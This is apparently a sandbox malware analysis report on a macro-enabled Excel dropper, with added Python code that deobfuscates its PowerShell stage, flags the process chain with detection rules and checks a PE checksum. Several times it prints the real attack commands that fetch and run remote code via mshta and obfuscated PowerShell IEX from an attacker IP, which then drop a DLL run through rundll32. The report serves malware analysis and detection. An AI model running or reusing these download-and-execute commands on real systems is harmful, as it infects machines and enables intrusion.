Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: DOCUMENT_2801.xls OLE indicator, VBA macros: true
Source: DOCUMENT_2801.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@1/35
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: DOCUMENT_2801.xls OLE indicator, Workbook stream: true
Source: DOCUMENT_2801.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 11_2_100125C0
Source: DOCUMENT_2801.xls ReversingLabs: Detection: 16%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe Console Write: (raw console buffer; recoverable text: "Microsoft Windows [Version 6.1.7601]")
Source: C:\Windows\System32\cmd.exe Console Write: (raw console buffer; recoverable text: prompt "C:\Users\Albus\Documents>")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: (raw console buffer; recoverable text: prompt "PS C:\Users\Albus\Documents> ")
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
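The process tree above (Excel 4.0 macro to cmd.exe with an environment-variable indirection, mshta.exe fetching se.html, a PowerShell stage built from `.replace()` fragments and `-Join`, then rundll32.exe loading a DLL from C:\ProgramData and re-launching it from a random directory under SysWOW64 with a non-DLL extension) is what the Sigma hits in the overview key on. As an added example that is not part of the analysis report or of the sample, the Python below first recovers the second-stage URL from the PowerShell command line copied verbatim from the tree, then runs detection rules modelled on those Sigma hits over constructed process-creation events. The ProcEvent record, the rule names and the pids are assumptions for illustration, not fields or names from the report.

```python
"""Added example, not part of the analysis report: deobfuscate the PowerShell
stage and detect the process chain shown in the report's process tree.
The command line is copied verbatim from the report; the process-creation
events, rule names and ProcEvent fields are constructed for illustration."""
import re
from dataclasses import dataclass

# Verbatim from the report: mshta.exe -> powershell.exe command line.
POWERSHELL_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit '
    r"$c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t "
    r"N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); "
    r"$c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}"
    r"{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); "
    r"$c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}"
    r"://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');"
    r"$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"
)

# $name='<literal with junk>'.replace('<junk>', '')   and   ($a,$b,... -Join '')
ASSIGN_RE = re.compile(r"\$(\w+)='((?:[^']|'')*)'\.replace\('([^']*)',\s*''\)")
JOIN_RE = re.compile(r"\(((?:\$\w+,?)+)\s+-Join\s+''\)", re.I)


def deobfuscate_replace_join(cmdline: str) -> str:
    """Rebuild the string the sample feeds to IEX: strip the junk token from
    each literal, collapse doubled single quotes, concatenate in -Join order."""
    parts = {}
    for name, literal, junk in ASSIGN_RE.findall(cmdline):
        parts[name] = literal.replace(junk, "").replace("''", "'")
    m = JOIN_RE.search(cmdline)
    if not m:
        return ""
    order = [v.lstrip("$") for v in m.group(1).split(",")]
    return "".join(parts.get(v, "") for v in order)


def extract_urls(text: str) -> list:
    return re.findall(r"https?://[^\s'\"()]+", text)


@dataclass
class ProcEvent:          # minimal process-creation record (constructed)
    pid: int
    image: str
    parent_image: str
    cmdline: str


OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _rundll32_module(cmdline: str) -> str:
    """Module argument of a rundll32 command line, quoted or bare."""
    args = re.split(r"rundll32\.exe", cmdline, maxsplit=1, flags=re.I)[-1].strip()
    m = re.match(r'"([^"]+)"|([^\s,]+)', args)
    return (m.group(1) or m.group(2)) if m else ""


def detect(events) -> dict:
    """Map pid -> set of rule names; rules mirror the Sigma hits in the report."""
    hits = {}
    for e in events:
        img, parent, cl = _base(e.image), _base(e.parent_image), e.cmdline
        rules = set()
        if parent in OFFICE and img in SHELLS:
            rules.add("office_spawns_shell")
        if img == "cmd.exe" and re.search(r"\|\s*cmd(\.exe)?\b", cl, re.I):
            rules.add("cmd_piped_to_shell")      # set x=... & echo %x% | cmd
        if parent == "mshta.exe" and img in {"cmd.exe", "powershell.exe"}:
            rules.add("mshta_spawns_shell")
        if img == "powershell.exe" and "`" in cl and re.search(r"\biex\b", cl.replace("`", ""), re.I):
            rules.add("obfuscated_iex")          # I`E`X
        if img == "rundll32.exe":
            mod = _rundll32_module(cl).lower()
            if mod.startswith("c:\\programdata\\"):
                rules.add("rundll32_programdata_module")
            if mod and not mod.endswith(".dll"):
                rules.add("rundll32_non_dll_module")   # .tpx / .zlf payloads
        if rules:
            hits[e.pid] = rules
    return hits


# Constructed events that follow the report's process tree (pids are arbitrary).
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    ProcEvent(2, r"C:\Windows\System32\cmd.exe", r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              "cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd"),
    ProcEvent(3, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
              "mshta http://91.240.118.172/ee/ss/se.html"),
    ProcEvent(4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe", POWERSHELL_CMDLINE),
    ProcEvent(5, r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat"),
    ProcEvent(6, r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer'),
]

if __name__ == "__main__":
    stage2 = deobfuscate_replace_join(POWERSHELL_CMDLINE)
    print("stage 2:", stage2, "->", extract_urls(stage2))
    for pid, rules in sorted(detect(SAMPLE_EVENTS).items()):
        print(pid, sorted(rules))
```

The deobfuscator only needs the three regular patterns the sample uses (`.replace('<junk>', '')` on each literal, `-Join ''` for ordering, backticks inside `IEX`), so it recovers `(New-Object Net.WebClient).DownloadString('http://91.240.118.172/ee/ss/se.png')` without executing anything. The parent-child rules are deliberately simple; the mshta.exe event itself (pid 3) triggers nothing here because its parent is cmd.exe, which is why the chain is caught at the Office-to-cmd and mshta-to-PowerShell edges and at the rundll32 module path rather than at any single process.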
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD509.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_00343C3B CreateToolhelp32Snapshot, 17_2_00343C3B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: 36E8.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Code function: 6_3_034D08CB push 8B490315h; iretd 6_3_034D08D0
Source: C:\Windows\System32\mshta.exe Code function: 6_3_034D00C1 push 8B490315h; iretd 6_3_034D00C7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00260A21 push eax; ret 8_2_000007FF00260C51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00260655 push eax; ret 8_2_000007FF00260791
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF002620D0 push eax; ret 8_2_000007FF002620D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF002623DD push eax; ret 8_2_000007FF002623F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00261B30 push eax; ret 8_2_000007FF00261B31
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00260002 push eax; ret 8_2_000007FF00260021
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00260000 push eax; ret 8_2_000007FF00260001
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF0026009A push eax; ret 8_2_000007FF002600D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B114C push ds; ret 11_2_002B114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B15F5 push cs; retf 11_2_002B15FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008109F5 push cs; retf 12_2_008109FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081054C push ds; ret 12_2_0081054D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073114C push ds; ret 12_2_0073114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007315F5 push cs; retf 12_2_007315FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10032B7D push ecx; ret 13_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10030DFF push ecx; ret 13_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060114C push ds; ret 13_2_0060114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006015F5 push cs; retf 13_2_006015FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029114C push ds; ret 14_2_0029114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002915F5 push cs; retf 14_2_002915FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027114C push ds; ret 16_2_0027114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002715F5 push cs; retf 16_2_002715FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0034114C push ds; ret 17_2_0034114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 11_2_1003D873
Source: Milossd.dll.8.dr Static PE information: real checksum: 0x8f55d should be: 0x8973e
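The static line above reports that the checksum stored in the header of the dropped Milossd.dll (0x8f55d) does not match the value computed over the file (0x8973e), the usual side effect of a payload being patched, packed or re-written after the linker filled in its header. As an added example, not code from the analysis report or from the sample, the Python below implements the checksum algorithm that imagehlp's CheckSumMappedFile uses (the same one tools such as pefile reimplement) and flags a mismatch the way the report does. The 256-byte PE stub it builds is constructed for the example and is not the dropped DLL.

```python
"""Added example, not part of the analysis report: recompute a PE file's
OptionalHeader.CheckSum and flag the kind of mismatch the report shows for
Milossd.dll. The 256-byte PE stub below is constructed for the example."""
import struct


def checksum_field_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum (same for PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20 + 64      # signature + COFF header + field offset


def pe_checksum(data: bytes) -> int:
    """One's-complement 16-bit sum of the whole file, skipping the CheckSum
    field itself, folded to 16 bits and added to the file length. This is the
    algorithm imagehlp's CheckSumMappedFile uses (as reimplemented in pefile)."""
    skip = checksum_field_offset(data)
    total = 0
    for off in range(0, len(data) - 1, 2):
        if off in (skip, skip + 2):    # the 32-bit CheckSum field is two words
            continue
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    if len(data) % 2:                  # trailing odd byte
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def with_checksum(data: bytes, value: int) -> bytes:
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), value)
    return bytes(buf)


def checksum_mismatch(data: bytes):
    """(stored, real) when they differ, None when the header is consistent."""
    stored, real = stored_checksum(data), pe_checksum(data)
    return None if stored == real else (stored, real)


def build_sample_pe() -> bytes:
    """Constructed 256-byte PE32 DLL stub: valid MZ/PE headers, all else zero."""
    buf = bytearray(256)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)             # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x44, 0x014C, 1)       # Machine i386, 1 section
    struct.pack_into("<HH", buf, 0x54, 0xE0, 0x2102)    # SizeOfOptionalHeader, DLL flags
    struct.pack_into("<H", buf, 0x58, 0x010B)           # PE32 magic
    return bytes(buf)


if __name__ == "__main__":
    pe = build_sample_pe()
    print("real checksum: %#x" % pe_checksum(pe))
    print("patched header ->", checksum_mismatch(with_checksum(pe, 0xDEADBEEF)))
```

Because the field is skipped during the sum, writing any value into the header leaves the computed checksum unchanged, which is what makes the stored/real comparison meaningful. A mismatch on its own is weak evidence: plenty of legitimately built, unsigned binaries carry a zero or stale checksum, so treat it as corroboration next to the drop location under C:\ProgramData and the DllRegisterServer launch, not as a detection by itself.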

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\Milossd.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100134F0 IsIconic, 13_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 13_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (reported 11 times) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (reported 8 times) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX (reported 22 times) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (reported 51 times) Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (reported 10 times) Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\mshta.exe TID: 2552 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000C.00000002.509950436.00000000002AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 11_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 13_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0035BAEA FindFirstFileW, 17_2_0035BAEA
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 11_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CD374 mov eax, dword ptr fs:[00000030h] 11_2_002CD374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082C774 mov eax, dword ptr fs:[00000030h] 12_2_0082C774
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074D374 mov eax, dword ptr fs:[00000030h] 12_2_0074D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061D374 mov eax, dword ptr fs:[00000030h] 13_2_0061D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AD374 mov eax, dword ptr fs:[00000030h] 14_2_002AD374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028D374 mov eax, dword ptr fs:[00000030h] 16_2_0028D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0035D374 mov eax, dword ptr fs:[00000030h] 17_2_0035D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 11_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 13_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 13_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 74.207.230.120 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 139.196.72.155 144 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html Jump to behavior
